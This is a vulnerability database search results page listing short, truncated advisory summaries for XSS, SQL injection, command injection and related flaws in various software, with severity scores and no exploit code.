Lucene search
K

178 matches found

Positive Technologies
Positive Technologies
added 2025/01/13 12:0 a.m.3 views

PT-2025-1476 · Unknown · Selesta Visual Access Manager

The software that is vulnerable is Selesta Visual Access Manager, specifically versions less than 4.42.2. The vulnerability is a Cross Site Scripting XSS vulnerability that can be exploited via the /common/autocomplete.php file. This vulnerability has been assigned the CVE identifier...

6.1CVSS5.9AI score0.00224EPSS
Exploits0References5
OSV
OSV
added 2024/12/23 5:23 p.m.12 views

CVE-2024-56363 APTRS has SSTI vulnerability

APTRS Automated Penetration Testing Reporting System is a Python and Django-based automated reporting tool designed for penetration testers and security organizations. In 1.0, there is a vulnerability in the web application's handling of user-supplied input that is incorporated into a Jinja2...

7.8CVSS7.5AI score0.00334EPSS
Exploits0References4
Snyk
Snyk
added 2024/12/12 7:22 p.m.4 views

Cross-site Scripting (XSS)

Overview Affected versions of this package are vulnerable to Cross-site Scripting XSS through the toHTMLEx method. An attacker can execute arbitrary JavaScript code by injecting malicious input. Details Cross-site scripting or XSS is a code vulnerability that occurs when an attacker “injects” a...

6.8CVSS5.4AI score0.00444EPSS
Exploits0References2
Cvelist
Cvelist
added 2024/11/20 12:0 a.m.17 views

CVE-2024-51209

Cross-Site Scripting XSS vulnerabilities in Anuj Kumar's Client Management System Version 1.2 allow local attackers to inject arbitrary web script or HTML via the search input field parameter to admin search invoice page and client search invoice page...

0.0026EPSS
Exploits1References2
OSV
OSV
added 2024/11/14 3:15 p.m.3 views

CVE-2024-11212

A vulnerability, which was classified as critical, has been found in SourceCodester Best Employee Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/fetchproductdetails.php. The manipulation of the argument barcode leads to sql injection. The attack may...

8.8CVSS6.5AI score0.00645EPSS
Exploits1References5
Snyk
Snyk
added 2024/07/11 5:40 p.m.3 views

Cross-site Scripting

Overview org.webjars.bowergithub.jasny:bootstrap is a popular front-end framework for faster and easier web development. Affected versions of this package are vulnerable to Cross-site Scripting through the data-loading-text attribute in the button component. An attacker can execute arbitrary...

6.4CVSS5.6AI score0.00494EPSS
Exploits0References2
Vulnrichment
Vulnrichment
added 2024/06/26 10:41 p.m.16 views

CVE-2024-28984 Hitachi Vantara Pentaho Business Analytics Server - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Hitachi Vantara Pentaho Business Analytics Server prior to versions 10.1.0.0 and 9.3.0.7, including 8.3.x allow a malicious URL to inject content into the Analyzer plugin interface...

8.8CVSS6.8AI score0.00254EPSS
Exploits0References1
NVD
NVD
added 2024/06/17 4:15 a.m.10 views

CVE-2024-6046

Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority...

Exploits0
CNNVD
CNNVD
added 2024/04/25 12:0 a.m.3 views

Employee Task Management System SQL注入漏洞

Employee Task Management System is an Employee Task Management System developed by Carlo Montero, an individual developer. A SQL injection vulnerability exists in Employee Task Management System v1.0, which is vulnerable to SQL injection via admin-manage-user.php...

8.8CVSS8AI score0.00669EPSS
Exploits1References2
OSV
OSV
added 2024/02/16 2:15 a.m.5 views

CVE-2024-0038

In injectInputEventToInputFilter of AccessibilityManagerService.java, there is a possible arbitrary input event injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for...

7.8CVSS6AI score0.00133EPSS
Exploits0References2
Prion
Prion
added 2024/02/16 2:15 a.m.21 views

Input validation

In injectInputEventToInputFilter of AccessibilityManagerService.java, there is a possible arbitrary input event injection due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for...

7.9AI score0.00133EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2024/02/15 12:0 a.m.5 views

PT-2024-15313 · Google · Android

Name of the Vulnerable Software and Affected Versions: Android affected versions not specified Description: The issue is related to a missing permission check in the injectInputEventToInputFilter function of AccessibilityManagerService.java. This could lead to arbitrary input event injection,...

8.4CVSS6.8AI score0.00133EPSS
Exploits0References7
Positive Technologies
Positive Technologies
added 2023/12/29 12:0 a.m.5 views

PT-2023-31806 · Brainstorm Force · Wp Remote Site Search

Name of the Vulnerable Software and Affected Versions: Brainstorm Force WP Remote Site Search versions 1.0.4 and earlier Description: The issue is related to Improper Neutralization of Input During Web Page Generation, also known as 'Cross-site Scripting', which allows Stored XSS. This means that...

6.5CVSS6.1AI score0.00328EPSS
Exploits0References6
OSV
OSV
added 2023/09/01 7:15 p.m.3 views

DEBIAN-CVE-2023-1523

Using the TIOCLINUX ioctl request, a malicious snap could inject contents into the input of the controlling terminal which could allow it to cause arbitrary commands to be executed outside of the snap sandbox after the snap exits. Graphical terminal emulators like xterm, gnome-terminal and others...

10CVSS8.6AI score0.01447EPSS
Exploits1References1
Packet Storm
Packet Storm
added 2023/08/29 12:0 a.m.227 views

Foodiee Online Food Ordering Web Application 1.0.0 Cross Site Scripting

==================================================================================================================================== | Title : Foodiee - Online Food Ordering Web Application V1.0.0 XSS Vulnerability | | Author : indoushka | | Tested on : windows 10 Français V.Pro / browser : Mozil...

7.1AI score
Exploits0
Github Security Blog
Github Security Blog
added 2023/08/09 2:41 p.m.22 views

ScanCode.io command injection in docker image fetch process

Command Injection in docker fetch process Summary A possible command injection in the docker fetch process as it allows to append malicious commands in the dockerreference parameter. Details In the function scanpipe/pipes/fetch.py:fetchdockerimage1 the parameter dockerreference is user...

8.8CVSS8AI score0.02437EPSS
Exploits1References6Affected Software1
RedHat Linux
RedHat Linux
added 2023/08/03 2:15 p.m.4 views

golang: html/template: improper sanitization of CSS values

A flaw was found in golang where angle brackets were not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separated by a '/' character could result in the CSS context unexpectedly closing, allowing for the injection of unexpected HMTL if...

7.3CVSS6.6AI score0.01037EPSS
Exploits0References6
Vulnrichment
Vulnrichment
added 2023/06/22 12:0 a.m.11 views

CVE-2023-31868

Sage X3 version 12.14.0.50-0 is vulnerable to Cross Site Scripting XSS. Some parts of the Web application are dynamically built using user's inputs. Yet, those inputs are not verified nor filtered by the application, so they mathed the expected format. Therefore, when HTML/JavaScript code is...

6.8AI score0.00352EPSS
Exploits0References2
Cvelist
Cvelist
added 2023/05/09 1:35 a.m.21 views

CVE-2023-30743 Improper Neutralization of Input in SAPUI5

Due to improper neutralization of input in SAPUI5 - versions SAPUI 750, SAPUI 754, SAPUI 755, SAPUI 756, SAPUI 757, UI700 200, sap.m.FormattedText SAPUI5 control allows injection of untrusted CSS. This blocks user’s interaction with the application. Further, in the absence of URL validation by th...

7.1CVSS7.1AI score0.00438EPSS
Exploits0References2
CVE
CVE
added 2023/03/24 7:31 a.m.50 views

CVE-2023-1616

CVE-2023-1616 affects XiaoBingBy TeaCMS up to version 2.0.2, specifically the Article Title Handler component. The issue is a cross-site scripting vulnerability triggered by manipulating input such as , with remote exploitability. The public exploit is noted, and multiple sources confirm the vuln...

5.4CVSS4.4AI score0.00475EPSS
Exploits1References3Affected Software1
Rows per page
Query Builder